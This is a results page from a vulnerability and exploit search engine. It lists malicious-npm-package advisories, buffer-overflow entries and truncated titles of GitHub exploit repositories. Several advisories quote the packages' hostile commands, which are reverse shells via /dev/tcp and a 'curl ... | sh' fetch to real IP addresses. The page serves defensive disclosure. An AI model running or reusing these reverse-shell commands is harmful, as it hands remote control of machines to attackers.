CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1794 matches found

OSV•added 2026/05/25 3:45 a.m.•2 views

MAL-2026-4679 Malicious code in system-user-identifier-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8 index.js line 13 executes bash -c "bash -i & /dev/tcp/101.43.232.7/7777 0&1" via childprocess.exec, opening an interactive reverse shell to the...

5.9AI score

Exploits0References7

OSSF Malicious Packages•added 2026/05/25 3:45 a.m.•7 views

Malicious code in system-user-identifier-cli (npm)

5.9AI score

Exploits0References7

Positive Technologies•added 2026/05/25 12:0 a.m.•5 views

PT-2026-43228

Socusoft 3GP Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft malicious input in the Registration Name and Registration Key fields to...

8.6CVSS6.5AI score0.00017EPSS

Exploits0References4

Positive Technologies•added 2026/05/25 12:0 a.m.•7 views

PT-2026-43229

Flash Slideshow Maker Professional 5.20 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious payload and paste it into the Name and Code fields of the...

8.6CVSS6.5AI score0.00017EPSS

Exploits0References4

Positive Technologies•added 2026/05/25 12:0 a.m.•5 views

PT-2026-43227

SocuSoft iPod Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by overwriting the structured exception handler. Attackers can craft malicious input in the Registration Name and Registration Key fields to...

8.6CVSS6.6AI score0.00017EPSS

Exploits0References4

GithubExploit•added 2026/05/24 5:21 p.m.•53 views

ClipBucket-EDB-44250

ClipBucket-EDB-44250 Unauthenticated Remote Code Execution in...

6AI score

Exploits0

GithubExploit•added 2026/05/22 4:36 p.m.•67 views

Exploit for Unrestricted Upload of File with Dangerous Type in Wordpress

WordPress Crop Image RCE — CVE-2019-8942 / CVE-2019-8943 Pyth...

8.8CVSS5.9AI score0.9373EPSS

Exploits10

OSSF Malicious Packages•added 2026/05/22 1:24 a.m.•10 views

Malicious code in internallib_v493 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

5.8AI score

Exploits0References3

OSV•added 2026/05/22 1:24 a.m.•3 views

MAL-2026-4585 Malicious code in internallib_v493 (npm)

5.8AI score

Exploits0References3

OSV•added 2026/05/20 1:55 p.m.•8 views

MAL-2026-4657 Malicious code in randomlogs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c085eee0876092131c3f909facc237674fcfb1e02bafbafcb34230c87b3a3819 The package's main module index.js lines 6-10 exports a function mal that opens a TCP socket to 223.229.156.10:5513 and pipes a spawned shell /bin/sh...

5.8AI score

Exploits0References4

OSSF Malicious Packages•added 2026/05/20 1:55 p.m.•8 views

Malicious code in randomlogs (npm)

5.8AI score

Exploits0References4

GithubExploit•added 2026/05/20 12:54 p.m.•55 views

Exploit for Path Traversal in Gogs

CVE-2025-8110 PoC Python proof-of-concept script for triggerin...

8.8CVSS7.4AI score0.17737EPSS

Exploits14

GithubExploit•added 2026/05/18 12:59 a.m.•41 views

Exploit for Improper Input Validation in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

🚀 Automated Log4Shell CVE-2021-44228 Play & Plug Lab An aut...

10CVSS7.4AI score0.94358EPSS

Exploits341

CVE•added 2026/05/17 12:11 p.m.•9 views

CVE-2018-25320

CVE-2018-25320 affects ACL Analytics 11.x through 13.0.0.579. The vulnerability is an arbitrary code execution via the EXECUTE function, enabling an attacker to run commands with SYSTEM privileges. Reported chain includes using bitsadmin to download malicious PowerShell scripts and execute them t...

9.8CVSS6.5AI score0.00128EPSS

Exploits0References4

CNNVD•added 2026/05/17 12:0 a.m.•6 views

ACL Analytics 代码注入漏洞

ACL Analytics is a data analysis platform provided by ACL Corporation, which supports audit analysis, data mining, and risk monitoring. Versions 11.x to 13.0.0.579 of ACL Analytics have a code injection vulnerability. This vulnerability stems from the use of the EXECUTE function, which may allow...

9.8CVSS6.2AI score0.00128EPSS

Exploits0References1

GithubExploit•added 2026/05/16 6:8 p.m.•64 views

Exploit for CVE-2021-33393

IPFire2.25RCEAuthenticated This exploit is based on CVE-202...

9CVSS7.3AI score0.72182EPSS

Exploits6

GithubExploit•added 2026/05/15 12:26 p.m.•39 views

SECpocs

Next.js React Server Components RCE Exploit Exploits CVE-2025...

10CVSS6.4AI score0.84541EPSS

Exploits361

OSV•added 2026/05/14 7:25 p.m.•6 views

MAL-2026-3771 Malicious code in request-logger-canary (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cf0d566d7abb400988aea74b00099a6db4c5ea928f32e7d44648193e21a36035 [email protected] ships a preinstall.js that, when npm install runs, opens a TCP socket to 52.74.242.200:8851 and pipes an interactive...

5.9AI score

Exploits0References1

OSSF Malicious Packages•added 2026/05/14 7:25 p.m.•7 views

Malicious code in request-logger-canary (npm)

5.9AI score

Exploits0References1

GithubExploit•added 2026/05/14 12:37 p.m.•68 views

Exploit for CVE-2026-42945

NGINX Rift RCE Exploit CVE-2026-42945 A professional Proof-...

9.2CVSS6.2AI score0.00288EPSS

Exploits34

Rows per page